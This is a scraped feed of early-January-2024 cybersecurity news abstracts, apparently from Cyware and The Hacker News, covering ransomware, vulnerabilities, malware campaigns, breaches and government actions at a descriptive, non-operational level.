Two Russian men, known as Icamis and Salomon, co-ran the top spam forum Spamdot and worked closely with dangerous cybercriminals, controlling botnets and harvesting passwords.

Cyware

January 10, 2024 – Ransomware

Free Decryptor Released for Black Basta and Babuk’s Tortilla Ransomware Victims Full Text

Abstract

A decryptor for the Tortilla variant of the Babuk ransomware has been released by Cisco Talos, allowing victims targeted by the malware to regain access to their files. The cybersecurity firm said the threat intelligence it shared with Dutch law enforcement authorities made it possible to arrest the threat actor behind the operations. The encryption key has also been shared with Avast, which had previously released a decryptor for Babuk ransomware after its source code was leaked in September 2021. The updated decryptor can be accessed here [EXE file]. "A single private key is used for all victims of the Tortilla threat actor," Avast noted . "This makes the update to the decryptor especially useful, as all victims of the campaign can use it to decrypt their files." The Tortilla campaign was first disclosed by Talos in November 2021, with the attacks leveraging ProxyShell flaws in Microsoft Exchange servers to drop the ransomware within victim environments. Tortilla

The Hacker News

January 10, 2024 – Government

DOJ to up Tempo of Cybercrime Operations in 2024, Senior Official Says Full Text

Abstract

The US Department of Justice expects an increase in government disruption operations in cybersecurity in 2024, with a focus on dismantling cybercriminal infrastructure and targeting individuals and companies supporting cybercrime.

Cyware

January 10, 2024 – Government

FTC Bans Outlogic (X-Mode) From Selling Sensitive Location Data Full Text

Abstract

The U.S. Federal Trade Commission (FTC) on Tuesday prohibited data broker Outlogic , which was previously known as X-Mode Social , from sharing or selling any sensitive location data with third-parties. The ban is part of a settlement over allegations that the company "sold precise location data that could be used to track people's visits to sensitive locations such as medical and reproductive health clinics, places of religious worship and domestic abuse shelters." The proposed order also requires it to destroy all the location data it previously gathered unless it obtains consumer consent or ensures the data has been de-identified or rendered non-sensitive as well as maintain a comprehensive list of sensitive locations and develop a comprehensive privacy program with a data retention schedule to prevent abuse. The FTC accused X-Mode Social and Outlogic of failing to establish adequate safeguards to prevent the misuse of such data by downstream customers. The dev

The Hacker News

January 10, 2024 – Breach

Hacker Claims to Breach Indian ISP Hathway and Leaks Four Million Users’ KYC Data Full Text

Abstract

The leaked data includes the personal information of over 41 million Hathway customers, but analysis suggests that the actual number of impacted accounts is around 4 million.

Cyware

January 10, 2024 – Vulnerabilities

Microsoft’s January 2024 Windows Update Patches 48 New Vulnerabilities Full Text

Abstract

Microsoft has addressed a total of 48 security flaws spanning its software as part of its Patch Tuesday updates for January 2024. Of the 48 bugs, two are rated Critical and 46 are rated Important in severity. There is no evidence that any of the issues are publicly known or under active attack at the time of release, making it the second consecutive Patch Tuesday with no zero-days. The fixes are in addition to nine security vulnerabilities that have been resolved in the Chromium-based Edge browser since the release of December 2023 Patch Tuesday updates. This also includes a fix for a zero-day ( CVE-2023-7024 , CVSS score: 8.8) that Google said has been actively exploited in the wild. The most critical among the flaws patched this month are as follows - CVE-2024-20674 (CVSS score: 9.0) - Windows Kerberos Security Feature Bypass Vulnerability CVE-2024-20700 (CVSS score: 7.5) - Windows Hyper-V Remote Code Execution Vulnerability "The authentication feature could be bypas

The Hacker News

January 10, 2024 – Business

anecdotes Raises $25M in Series B Funding Full Text

Abstract

The round was led by Glilot Capital Partners, with participation from existing investors. The company plans to use the funds to introduce new data-driven innovations in the GRC landscape and expand into markets across the US, EMEA, and APAC regions.

Cyware

January 10, 2024 – Government

CISA Flags 6 Vulnerabilities - Apple, Apache, Adobe , D-Link, Joomla Under Attack Full Text

Abstract

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added six security flaws to its Known Exploited Vulnerabilities ( KEV ) catalog, citing evidence of active exploitation. This includes CVE-2023-27524 (CVSS score: 8.9), a high-severity vulnerability impacting the Apache Superset open-source data visualization software that could enable remote code execution. It was fixed in version 2.1. Details of the issue first came to light in April 2023, with Horizon3.ai's Naveen Sunkavally describing it as a "dangerous default configuration in Apache Superset that allows an unauthenticated attacker to gain remote code execution, harvest credentials, and compromise data." It's currently not known how the vulnerability is being exploited in the wild. Also added by CISA are five other flaws - CVE-2023-38203 (CVSS score: 9.8) - Adobe ColdFusion Deserialization of Untrusted Data Vulnerability CVE-2023-29300 (CVSS score: 9.8) - Adobe ColdFusion Deserialization of Untrus

The Hacker News

January 9, 2024 – Ransomware

New Decryptor for Babuk Tortilla Ransomware Variant Released Full Text

Abstract

Cisco Talos, in collaboration with Dutch Police and Avast, recovered a decryptor for the Babuk Tortilla ransomware variant, allowing users to quickly recover their encrypted files.

Cyware

January 09, 2024 – Hacker

Alert: Water Curupira Hackers Actively Distributing PikaBot Loader Malware Full Text

Abstract

A threat actor called Water Curupira has been observed actively distributing the PikaBot loader malware as part of spam campaigns in 2023. "PikaBot's operators ran phishing campaigns, targeting victims via its two components — a loader and a core module — which enabled unauthorized remote access and allowed the execution of arbitrary commands through an established connection with their command-and-control (C&C) server," Trend Micro said in a report published today. The activity began in the first quarter of 2023 that lasted till the end of June, before ramping up again in September. It also overlaps with prior campaigns that have used similar tactics to deliver QakBot, specifically those orchestrated by cybercrime groups known as TA571 and TA577. It's believed that the increase in the number of phishing campaigns related to PikaBot is the result of QakBot's takedown in August, with DarkGate emerging as another replacement. PikaBot is primarily a loader, which means

The Hacker News

January 9, 2024 – Government

US DHS Solicits Synthetic Data Expertise for AI Training Full Text

Abstract

The U.S. federal government is seeking synthetic data generators to train machine learning models and test systems in instances where real-world data is unavailable or poses privacy and security risks.

Cyware

January 09, 2024 – Attack

Turkish Hackers Exploiting Poorly Secured MS SQL Servers Across the Globe Full Text

Abstract

Poorly secured Microsoft SQL (MS SQL) servers are being targeted in the U.S., European Union, and Latin American (LATAM) regions as part of an ongoing financially motivated campaign to gain initial access. "The analyzed threat campaign appears to end in one of two ways, either the selling of 'access' to the compromised host, or the ultimate delivery of ransomware payloads," Securonix researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov said in a technical report shared with The Hacker News. The campaign, linked to actors of Turkish origin, has been codenamed RE#TURGENCE by the cybersecurity firm. Initial access to the servers entails conducting brute-force attacks, followed by the use of xp_cmdshell configuration option to run shell commands on the compromised host. This activity mirrors that of a prior campaign dubbed DB#JAMMER that came to light in September 2023. This stage paves the way for the retrieval of a PowerShell script from a remote server that's responsible f

The Hacker News

January 9, 2024 – Vulnerabilities

High-Severity Vulnerabilities Patched in QNAP QTS, Video Station, QuMagie, Netatalk Products Full Text

Abstract

While there is no evidence that the flaws have been exploited in the wild, it's recommended that users take steps to update their installations to the latest version to mitigate potential risks.

Cyware

January 09, 2024 – Education

Why Public Links Expose Your SaaS Attack Surface Full Text

Abstract

Collaboration is a powerful selling point for SaaS applications. Microsoft, Github, Miro, and others promote the collaborative nature of their software applications that allows users to do more. Links to files, repositories, and boards can be shared with anyone, anywhere. This encourages teamwork that helps create stronger campaigns and projects by encouraging collaboration among employees dispersed across regions and departments. At the same time, the openness of data SaaS platforms can be problematic. A 2023 survey by the Cloud Security Alliance and Adaptive Shield found that 58% of security incidents over the last two years involved data leakage. Clearly, sharing is good, but data sharing must be put in check. Most SaaS applications have mechanisms to control sharing. These tools are quite effective in ensuring that company resources aren't open for display on the public web. This article will look at three common data leakage scenarios and recommend best practices for safe sh

The Hacker News

January 9, 2024 – Outage

Online Services Down for German Craft Associations Following ‘Security Incident’ Full Text

Abstract

The cyberattack has forced the affected Chambers to disconnect from the network and take their systems offline, causing disruption to vocational training and other online services.

Cyware

January 09, 2024 – Vulnerabilities

Alert: New Vulnerabilities Discovered in QNAP and Kyocera Device Manager Full Text

Abstract

A security flaw has been disclosed in Kyocera's Device Manager product that could be exploited by bad actors to carry out malicious activities on affected systems. "This vulnerability allows attackers to coerce authentication attempts to their own resources, such as a malicious SMB share, to capture or relay Active Directory hashed credentials if the 'Restrict NTLM: Outgoing NTLM traffic to remote servers' security policy is not enabled," Trustwave said . Tracked as CVE-2023-50916 , Kyocera, in an advisory released late last month, described it as a path traversal issue that enables an attacker to intercept and alter a local path pointing to the backup location of the database to a universal naming convention (UNC) path. This, in turn, causes the web application to attempt to authenticate the rogue UNC path, resulting in unauthorized access to clients' accounts and data theft. Furthermore, depending on the configuration of the environment, it could be exploited to

The Hacker News

January 9, 2024 – Breach

Saudi Ministry of Industry and Mineral Resources Exposed Sensitive Data for 15 Months Full Text

Abstract

The Saudi Ministry of Industry and Mineral Resources (MIM) had a sensitive environment file exposed for 15 months, potentially allowing attackers to gain unauthorized access and launch ransomware attacks.

Cyware

January 09, 2024 – Phishing

Beware! YouTube Videos Promoting Cracked Software Distribute Lumma Stealer Full Text

Abstract

Threat actors are resorting to YouTube videos featuring content related to cracked software in order to entice users into downloading an information stealer malware called Lumma. "These YouTube videos typically feature content related to cracked applications, presenting users with similar installation guides and incorporating malicious URLs often shortened using services like TinyURL and Cuttly," Fortinet FortiGuard Labs researcher Cara Lin said in a Monday analysis. This is not the first time pirated software videos on YouTube have emerged as an effective bait for stealer malware. Previously similar attack chains were observed delivering stealers, clippers, and crypto miner malware. In doing so, threat actors can leverage the compromised machines for not only information and cryptocurrency theft, but also abuse the resources for illicit mining. In the latest attack sequence documented by Fortinet, users searching for cracked versions of legitimate video editing tools like

The Hacker News

January 9, 2024 – Policy and Law

New York Clinic Must Pay $450K Fine, Spend $1.2M on Security Full Text

Abstract

The Refuah Health Center in New York has been fined up to $450,000 and required to invest over $1 million in improving its data security following a ransomware attack in 2021.

Cyware

January 9, 2024 – Vulnerabilities

Update: Apache OFBiz Zero-Day Sees Thousands of Daily Exploit Attempts Full Text

Abstract

The authentication bypass flaw in OFBiz allows attackers to remotely execute arbitrary code and access sensitive information. Upgrading to OFBiz version 18.12.11 is crucial to patch both this zero-day vulnerability and another equally serious hole.

Cyware

January 9, 2024 – Attack

Rhysida Ransomware Gang Takes Credit for Christmas Attack on Global Lutheran Organization Full Text

Abstract

The attack was carried out by the Rhysida ransomware gang, who also claimed responsibility for attacking the Lutheran World Federation, a member of the WCC. The WCC's systems went down on December 26, 2023.

Cyware

January 8, 2024 – Outage

Cyberattack Hits Maldives Government Websites Full Text

Abstract

Over the weekend, the Maldives government websites experienced a cyberattack, resulting in temporary unavailability of the President's office, Foreign Ministry, and Tourism Ministry websites.

Cyware

January 08, 2024 – Criminals

Syrian Hackers Distributing Stealthy C#-Based Silver RAT to Cybercriminals Full Text

Abstract

Threat actors operating under the name Anonymous Arabic have released a remote access trojan (RAT) called Silver RAT that's equipped to bypass security software and stealthily launch hidden applications. "The developers operate on multiple hacker forums and social media platforms, showcasing an active and sophisticated presence," cybersecurity firm Cyfirma said in a report published last week. The actors, assessed to be of Syrian origin and linked to the development of another RAT known as S500 RAT, also run a Telegram channel offering various services such as the distribution of cracked RATs, leaked databases, carding activities, and the sale of Facebook and X (formerly Twitter) bots. The social media bots are then utilized by other cyber criminals to promote various illicit services by automatically engaging with and commenting on user content. In-the-wild detections of Silver RAT v1.0 were first observed in November 2023, although the threat actor's plans to release the tr

The Hacker News

January 8, 2024 – Denial Of Service

NoName Group Claims DDoS Attacks on Ukrainian Government Sites Full Text

Abstract

The NoName group has reportedly targeted several Ukrainian government websites, including Accordbank, Zaporizhzhya Titanium-Magnesium Plant, and the State Tax Service. The group posted a list of their latest DDoS attack victims on the dark web.

Cyware

January 08, 2024 – General

Unifying Security Tech Beyond the Stack: Integrating SecOps with Managed Risk and Strategy Full Text

Abstract

Cybersecurity is an infinite journey in a digital landscape that never ceases to change. According to Ponemon Institute 1 , "only 59% of organizations say their cybersecurity strategy has changed over the past two years." This stagnation in strategy adaptation can be traced back to several key issues. Talent Retention Challenges: The cybersecurity field is rapidly advancing, requiring a skilled and knowledgeable workforce. However, organizations face a critical shortage of such talent, making it difficult to keep strategies agile and relevant. Leadership Focus : Often, the attention of leadership teams is divided across various priorities, and cybersecurity may not be at the forefront. This can result in strategies becoming outdated and less effective. Board Engagement: Adequate board support is essential for strategy evolution. A lack of comprehensive understanding of cybersecurity issues at the board level can lead to insufficient resources and support for strategic updates.

The Hacker News

January 8, 2024 – Botnet

Bots, Fraud Farms, and Cryptojacking Surge, Urgently Requiring Attention Full Text

Abstract

Cybercriminals are increasingly relying on ready-made bots and human fraud farms, which account for the majority of malicious website and app traffic, highlighting the need for robust defenses.

Cyware

January 08, 2024 – Education

Webinar – Leverage Zero Trust Security to Minimize Your Attack Surface Full Text

Abstract

Digital expansion inevitably increases the external attack surface, making you susceptible to cyberthreats. Threat actors increasingly exploit the vulnerabilities stemming from software and infrastructure exposed to the internet; this ironically includes security tools, particularly firewalls and VPNs, which give attackers direct network access to execute their attacks. In fact, Gartner identified attack surface expansion as a major trend to watch. So, it is not surprising that External Attack Surface Management (EASM) is a growing priority for organizations. But traditional castle-and-moat-based security architectures are ineffective at protecting enterprises against today's sophisticated attacks, which increasingly leverage AI and as-a-service models to maximize speed and damage. Zero trust security is the best way to minimize the attack surface, prevent compromise, eliminate lateral movement, and stop data loss. Register here and join Apoorva Ravikrishnan, Senior Manager of P

The Hacker News

January 8, 2024 – Breach

Canada: Personal and Pregnancy Details of Midwives of Windsor Clients was Breached Full Text

Abstract

The compromised data includes names, addresses, contact information, medical details, and health insurance information. The exact number of affected clients is unclear, and it is unknown if the information has been misused.

Cyware

January 08, 2024 – Government

NIST Warns of Security and Privacy Risks from Rapid AI System Deployment Full Text

Abstract

The U.S. National Institute of Standards and Technology (NIST) is calling attention to the privacy and security challenges that arise as a result of increased deployment of artificial intelligence (AI) systems in recent years. "These security and privacy challenges include the potential for adversarial manipulation of training data, adversarial exploitation of model vulnerabilities to adversely affect the performance of the AI system, and even malicious manipulations, modifications or mere interaction with models to exfiltrate sensitive information about people represented in the data, about the model itself, or proprietary enterprise data," NIST said . As AI systems become integrated into online services at a rapid pace, in part driven by the emergence of generative AI systems like OpenAI ChatGPT and Google Bard, models powering these technologies face a number of threats at various stages of the machine learning operations. These include corrupted training data, security flaw

The Hacker News

January 8, 2024 – Attack

Beirut International Airport Hit by Cyberattack Affecting Flight Information Display System Full Text

Abstract

The Beirut International Airport in Lebanon was targeted by a cyberattack, with hackers breaching the Flight Information Display System (FIDS) and disrupting the baggage inspection system.

Cyware

January 08, 2024 – Policy and Law

DoJ Charges 19 Worldwide in $68 Million xDedic Dark Web Marketplace Fraud Full Text

Abstract

The U.S. Department of Justice (DoJ) said it charged 19 individuals worldwide in connection with the now-defunct xDedic Marketplace , which is estimated to have facilitated more than $68 million in fraud. In wrapping up its investigation into the dark web portal, the agency said the transnational operation was the result of close cooperation with law enforcement authorities from Belgium, Germany, the Netherlands, Ukraine, and Europol. Of the 19 defendants, three have been sentenced to 6.5 years in prison, eight have been awarded jail terms ranging from one year to five years, and one individual has been ordered to serve five years' probation. One among them includes Glib Oleksandr Ivanov-Tolpintsev, a Ukrainian national who was sentenced to four years in prison in May 2022 for selling compromised credentials on xDedic and making $82,648 in illegal profits. Dariy Pankov, described by the DoJ as one of the highest sellers by volume, offered credentials of no less than 35,000 ha

The Hacker News

January 8, 2024 – Outage

Update: Traces of LockBit Foul Play Emerge in Capital Health Cyberattack Full Text

Abstract

Capital Health is now fully operational and working with a forensic investigation firm to assess the risk to patient and employee data. While the firm has not disclosed the hacker group involved, it has been alleged that LockBit ransomware was used.

Cyware

January 08, 2024 – Cryptocurrency

North Korea’s Cyber Heist: DPRK Hackers Stole $600 Million in Cryptocurrency in 2023 Full Text

Abstract

Threat actors affiliated with the Democratic People's Republic of Korea (also known as North Korea) have plundered at least $600 million in cryptocurrency in 2023. The DPRK "was responsible for almost a third of all funds stolen in crypto attacks last year, despite a 30% reduction from the USD 850 million haul in 2022," blockchain analytics firm TRM Labs said last week. "Hacks perpetrated by the DPRK were on average ten times as damaging as those not linked to North Korea." There are indications that additional breaches targeting the crypto sector towards the end of 2023 could push this figure higher to around $700 million. The targeting of cryptocurrency companies is not new for North Korean state-sponsored actors, who have stolen about $3 billion since 2017. These financially motivated attacks are seen as a crucial revenue-generation mechanism for the sanctions-hit nation, funding its weapons of mass destruction (WMD) and ballistic missile program

The Hacker News

January 6, 2024 – Hacker

Syrian Threat Group Peddles Destructive SilverRAT Full Text

Abstract

A group known as Anonymous Arabic, with links to Turkey and Syria, is behind a sophisticated remote access Trojan called SilverRAT. They plan to release an updated version that can control compromised Windows systems and Android devices.

Cyware

January 06, 2024 – Attack

Sea Turtle Cyber Espionage Campaign Targets Dutch IT and Telecom Companies Full Text

Abstract

Telecommunication, media, internet service providers (ISPs), information technology (IT)-service providers, and Kurdish websites in the Netherlands have been targeted as part of a new cyber espionage campaign undertaken by a Türkiye-nexus threat actor known as Sea Turtle . "The infrastructure of the targets was susceptible to supply chain and island-hopping attacks, which the attack group used to collect politically motivated information such as personal information on minority groups and potential political dissents," Dutch security firm Hunt & Hackett said in a Friday analysis. "The stolen information is likely to be exploited for surveillance or intelligence gathering on specific groups and or individuals." Sea Turtle, also known by the names Cosmic Wolf, Marbled Dust (formerly Silicon), Teal Kurma, and UNC1326, was first documented by Cisco Talos in April 2019, detailing state-sponsored attacks targeting public and private entities in the Middle E

The Hacker News

January 6, 2024 – Criminals

Swatting: The New Normal in Ransomware Extortion Tactics Full Text

Abstract

Extortionists are resorting to swatting as a new tactic to pressure hospitals into paying ransom demands. Swatting involves making false reports to the police, resulting in heavily armed officers showing up at victims' homes.

Cyware

January 06, 2024 – Attack

Pro-Iranian Hacker Group Targeting Albania with No-Justice Wiper Malware Full Text

Abstract

The recent wave of cyber attacks targeting Albanian organizations involved the use of a wiper called No-Justice . The findings come from cybersecurity company ClearSky, which said the Windows-based malware "crashes the operating system in a way that it cannot be rebooted." The intrusions have been attributed to an Iranian "psychological operation group" known as Homeland Justice, which has been active since July 2022, specifically orchestrating destructive attacks against Albania. On December 24, 2023, the adversary resurfaced after a hiatus, stating it's "back to destroy supporters of terrorists," describing its latest campaign as #DestroyDurresMilitaryCamp. The Albanian city of Durrës currently hosts the dissident group People's Mojahedin Organization of Iran (MEK). Targets of the attack included ONE Albania, Eagle Mobile Albania, Air Albania, and the Albanian parliament. Two of the primary tools deployed during the campaign include an executa

The Hacker News

January 6, 2024 – Outage

West Virginia City Latest Municipality Hit With Cyberattack Full Text

Abstract

The city of Beckley, West Virginia, is currently grappling with a cyberattack, which has disrupted their computer network and prompted investigations into the incident's source and impact.

Cyware

January 6, 2024 – APT

Iranian APT Used No-Justice Wiper in Recent Albanian Attacks Full Text

Abstract

The cybersecurity firm ClearSky identified the tools used, including the No-Justice wiper and a PowerShell code. The malware had a valid digital signature, making it appear legitimate.

Cyware

January 05, 2024 – Malware

SpectralBlur: New macOS Backdoor Threat from North Korean Hackers Full Text

Abstract

Cybersecurity researchers have discovered a new Apple macOS backdoor called SpectralBlur that overlaps with a known malware family that has been attributed to North Korean threat actors. "SpectralBlur is a moderately capable backdoor that can upload/download files, run a shell, update its configuration, delete files, hibernate, or sleep, based on commands issued from the [command-and-control server]," security researcher Greg Lesnewich said . The malware shares similarities with KANDYKORN (aka SockRacket), an advanced implant that functions as a remote access trojan capable of taking control of a compromised host. It's worth noting that the KANDYKORN activity also intersects with another campaign orchestrated by the Lazarus sub-group known as BlueNoroff (aka TA444) which culminates in the deployment of a backdoor referred to as RustBucket and a late-stage payload dubbed ObjCShellz . In recent months, the threat actor has been observed combining disparate pieces of t

The Hacker News

January 05, 2024 – Education

Exposed Secrets are Everywhere. Here’s How to Tackle Them Full Text

Abstract

Picture this: you stumble upon a concealed secret within your company's source code. Instantly, a wave of panic hits as you grasp the possible consequences. This one hidden secret has the power to pave the way for unauthorized entry, data breaches, and a damaged reputation. Understanding the secret is just the beginning; swift and resolute action becomes imperative. However, lacking the necessary context, you're left pondering the optimal steps to take. What's the right path forward in this situation? Secrets management is an essential aspect of any organization's security strategy. In a world where breaches are increasingly common, managing sensitive information such as API keys, credentials, and tokens can make all the difference. Secret scanners play a role in identifying exposed secrets within source code, but they have one significant limitation: they don't provide context. And without context, it's impossible to devise an appropriate response plan. Con

The Hacker News

January 5, 2024 – Government

The FBI Is Adding More Cyber-Focused Agents to US Embassies Full Text

Abstract

The expansion of the FBI's cyber program reflects a shift towards a proactive approach, focusing on disrupting cybercriminal operations rather than just investigating after the fact.

Cyware

January 05, 2024 – Outage

Orange Spain Faces BGP Traffic Hijack After RIPE Account Hacked by Malware Full Text

Abstract

Mobile network operator Orange Spain suffered an internet outage for several hours on January 3 after a threat actor used administrator credentials captured by means of stealer malware to hijack the border gateway protocol ( BGP ) traffic. "The Orange account in the IP network coordination center (RIPE) has suffered improper access that has affected the browsing of some of our customers," the company said in a message posted on X (formerly Twitter). However, the company emphasized no personal data was compromised and that the incident only affected some browsing services. The threat actor, who goes by the name Ms_Snow_OwO on X, claimed to have gained access to Orange Spain's RIPE account. RIPE is a regional Internet registry ( RIR ) that oversees the allocation and registration of IP addresses and autonomous system (AS) numbers in Europe, Central Asia, Russia, and West Asia. "Using the stolen account, the threat actor modified the AS number belonging to Ora

The Hacker News

January 5, 2024 – Government

DOE Announces Up to $70 Million to Strengthen Energy Sector Against Physical and Cyber Hazards Full Text

Abstract

The funding opportunity is open to public and private stakeholders, universities, and DOE's National Laboratories, and will focus on developing innovative solutions to strengthen the resilience of America's energy systems.

Cyware

January 05, 2024 – Vulnerabilities

Alert: Ivanti Releases Patch for Critical Vulnerability in Endpoint Manager Solution Full Text

Abstract

Ivanti has released security updates to address a critical flaw impacting its Endpoint Manager (EPM) solution that, if successfully exploited, could result in remote code execution (RCE) on susceptible servers. Tracked as CVE-2023-39336, the vulnerability has been rated 9.6 out of 10 on the CVSS scoring system. The shortcoming impacts EPM 2021 and EPM 2022 prior to SU5. "If exploited, an attacker with access to the internal network can leverage an unspecified SQL injection to execute arbitrary SQL queries and retrieve output without the need for authentication," Ivanti said in an advisory. "This can then allow the attacker control over machines running the EPM agent. When the core server is configured to use SQL express, this might lead to RCE on the core server." The disclosure arrived weeks after the company resolved nearly two dozen security flaws in its Avalanche enterprise mobile device management (MDM) solution. Of the 21 issues, 13 are rated critical (CVSS scores: 9.8

The Hacker News

January 4, 2024 – Business

SentinelOne Acquires PingSafe to Expand Cloud Security Capabilities Full Text

Abstract

By integrating PingSafe's capabilities into SentinelOne's Singularity Platform, companies will have access to a unified, best-of-breed security platform for their entire cloud footprint.

Cyware

January 04, 2024 – Education

Three Ways To Supercharge Your Software Supply Chain Security Full Text

Abstract

Section four of the " Executive Order on Improving the Nation's Cybersecurity " introduced a lot of people in tech to the concept of a "Software Supply Chain" and securing it. If you make software and ever hope to sell it to one or more federal agencies, you have to pay attention to this. Even if you never plan to sell to a government, understanding your Software Supply Chain and learning how to secure it will pay dividends in a stronger security footing and the benefits it provides. This article will look at three ways to supercharge your Software Supply Chain Security . What is your Software Supply Chain? It's essentially everything that goes into building a piece of software: from the IDE in which the developer writes code, to the third-party dependencies, to the build systems and scripts, to the hardware and operating system on which it runs. Instabilities and vulnerabilities can be introduced, maliciously or not, from inception to deployment and even beyond. 1: Ke

The Hacker News

January 4, 2024 – Vulnerabilities

Threat Actor Demands $1M for Remote Command Injection Vulnerability in Cisco ASA Full Text

Abstract

The sale of this vulnerability poses significant risks, including network disruption, data compromise, and financial and reputational damage for organizations reliant on Cisco ASA.

Cyware

January 04, 2024 – Malware

Beware: 3 Malicious PyPI Packages Found Targeting Linux with Crypto Miners Full Text

Abstract

Three new malicious packages have been discovered in the Python Package Index (PyPI) open-source repository with capabilities to deploy a cryptocurrency miner on affected Linux devices. The three harmful packages, named modularseven, driftme, and catme, attracted a total of 431 downloads over the past month before they were taken down. "These packages, upon initial use, deploy a CoinMiner executable on Linux devices," Fortinet FortiGuard Labs researcher Gabby Xiong said , adding the campaign shares overlaps with a prior campaign that involved the use of a package called culturestreak to deploy a crypto miner. The malicious code resides in the __init__.py file, which decodes and retrieves the first stage from a remote server, a shell script ("unmi.sh") that fetches a configuration file for the mining activity as well as the CoinMiner file hosted on GitLab . The ELF binary file is then executed in the background using the nohup command , thus ensuring that the process contin

The Hacker News

January 4, 2024 – Breach

Update: Estes Refuses to Pay Off Ransomware Crew, Says Data Stolen Full Text

Abstract

The company chose not to pay the ransom demanded by the hackers, aligning with the FBI's recommendation, but the specific details of the attack and the stolen data remain undisclosed.

Cyware

January 04, 2024 – Phishing

UAC-0050 Group Using New Phishing Tactics to Distribute Remcos RAT Full Text

Abstract

The threat actor known as UAC-0050 is leveraging phishing attacks to distribute Remcos RAT using new strategies to evade detection from security software. "The group's weapon of choice is Remcos RAT, a notorious malware for remote surveillance and control, which has been at the forefront of its espionage arsenal," Uptycs security researchers Karthickkumar Kathiresan and Shilpesh Trivedi said in a Wednesday report. "However, in their latest operational twist, the UAC-0050 group has integrated a pipe method for interprocess communication , showcasing their advanced adaptability." UAC-0050, active since 2020, has a history of targeting Ukrainian and Polish entities via social engineering campaigns that impersonate legitimate organizations to trick recipients into opening malicious attachments. In February 2023, the Computer Emergency Response Team of Ukraine (CERT-UA) attributed the adversary to a phishing campaign designed to deliver Remcos RAT. Over t

The Hacker News

January 4, 2024 – Breach

Cloud-Native Cybersecurity Startup Aqua Security Raises $60M and Remains a Unicorn Full Text

Abstract

The Series E funding round was led by Evolution Equity Partners, with participation from existing investors Lightspeed Venture Partners, Insight Partners, and StepStone Group.

Cyware

January 04, 2024 – Outage

Mandiant’s Twitter Account Restored After Six-Hour Crypto Scam Hack Full Text

Abstract

American cybersecurity firm and Google Cloud subsidiary Mandiant had its X (formerly Twitter) account compromised for more than six hours by an unknown attacker to propagate a cryptocurrency scam. As of writing, the account has been restored on the social media platform. It's currently not clear how the account was breached. But the hacked Mandiant account was initially renamed to "@phantomsolw" to impersonate the Phantom crypto wallet service, according to MalwareHunterTeam and vx-underground . Specifically, the scam posts from the account advertised an airdrop scam that urged users to click on a bogus link and earn free tokens, with follow-up messages asking Mandiant to "change password please" and "check bookmarks when you get account back." Mandiant, a leading threat intelligence firm, was acquired by Google in March 2022 for $5.4 billion. It is now part of Google Cloud. "The Mandiant Twitter account takeover could have happened

The Hacker News

January 4, 2024 – Government

FTC Soliciting Contest Submissions to Help Tackle Voice Cloning Technology Full Text

Abstract

The FTC is seeking multidisciplinary approaches to prevent unauthorized use of voice cloning, improve real-time detection, and provide consumers with tools to identify cloned voices in audio clips.

Cyware

January 3, 2024 – Outage

‘Large-Scale’ Cyberattack Hits French Township, All Local Services Down Full Text

Abstract

The mayor of Pays Fouesnantais, a township in France, announced that the municipality has been hit by a large-scale cyberattack, causing all community services to be taken down.

Cyware

January 03, 2024 – Malware

Malware Using Google MultiLogin Exploit to Maintain Access Despite Password Reset Full Text

Abstract

Information stealing malware are actively taking advantage of an undocumented Google OAuth endpoint named MultiLogin to hijack user sessions and allow continuous access to Google services even after a password reset. According to CloudSEK, the critical exploit facilitates session persistence and cookie generation, enabling threat actors to maintain access to a valid session in an unauthorized manner. The technique was first revealed by a threat actor named PRISMA on October 20, 2023, on their Telegram channel. It has since been incorporated into various malware-as-a-service (MaaS) stealer families , such as Lumma, Rhadamanthys, Stealc, Meduza, RisePro, and WhiteSnake. The MultiLogin authentication endpoint is primarily designed for synchronizing Google accounts across services when users sign in to their accounts in the Chrome web browser (i.e., profiles ). A reverse engineering of the Lumma Stealer code has revealed that the technique targets the "Chrome's token_

The Hacker News

January 3, 2024 – Business

SonicWall Acquires Banyan to Boost Zero-Trust, SSE Offerings Full Text

Abstract

With its second acquisition in two months, SonicWall aims to help enterprises with growing remote workforces through zero-trust network and security service edge offerings.

Cyware

January 03, 2024 – Solution

5 Ways to Reduce SaaS Security Risks Full Text

Abstract

As technology adoption has shifted to be employee-led, just in time, and from any location or device, IT and security teams have found themselves contending with an ever-sprawling SaaS attack surface, much of which is often unknown or unmanaged. This greatly increases the risk of identity-based threats, and according to a recent report from CrowdStrike, 80% of breaches today use compromised identities, including cloud and SaaS credentials. Given this reality, IT security leaders need practical and effective SaaS security solutions designed to discover and manage their expanding SaaS footprint. Here are 5 key ways Nudge Security can help. Close the visibility gap Knowing the full scope of SaaS apps in use is the foundation of a modern IT governance program. Without an understanding of your entire SaaS footprint, you cannot say with confidence where your corporate IP is stored (Did someone sync their desktop to Dropbox?), you cannot make assumptions about your customer data (Did s

The Hacker News

January 3, 2024 – Breach

Threat Actor Leaks 3.6 Million Records Allegedly Stolen From Cross Switch Full Text

Abstract

The data breach, carried out by a threat actor named IntelBroker, has allegedly exposed sensitive details such as full names, emails, phone numbers, banking information, and more.

Cyware

January 03, 2024 – Vulnerabilities

SMTP Smuggling: New Flaw Lets Attackers Bypass Security and Spoof Emails Full Text

Abstract

A new exploitation technique called Simple Mail Transfer Protocol ( SMTP ) smuggling can be weaponized by threat actors to send spoofed emails with fake sender addresses while bypassing security measures. "Threat actors could abuse vulnerable SMTP servers worldwide to send malicious emails from arbitrary email addresses, allowing targeted phishing attacks," Timo Longin, a senior security consultant at SEC Consult, said in an analysis published last month. SMTP is a TCP/IP protocol used to send and receive email messages over a network. To relay a message from an email client (aka mail user agent), an SMTP connection is established between the client and server in order to transmit the actual content of the email. The server then relies on what's called a mail transfer agent (MTA) to check the domain of the recipient's email address, and if it's different from that of the sender, it queries the domain name system (DNS) to look up the MX (mail exchanger) rec

The Hacker News

January 3, 2024 – Outage

Hacktivists Shut Down Top State-Owned Belarusian News Agency Full Text

Abstract

Belarusian hacktivist group, the Cyber-Partisans, launched a cyberattack on the country's leading state-owned media outlet, wiping the main website servers and backups, as a retaliatory measure against President Lukashenko's propaganda campaign.

Cyware

January 03, 2024 – Policy and Law

DOJ Slams XCast with $10 Million Fine Over Massive Illegal Robocall Operation Full Text

Abstract

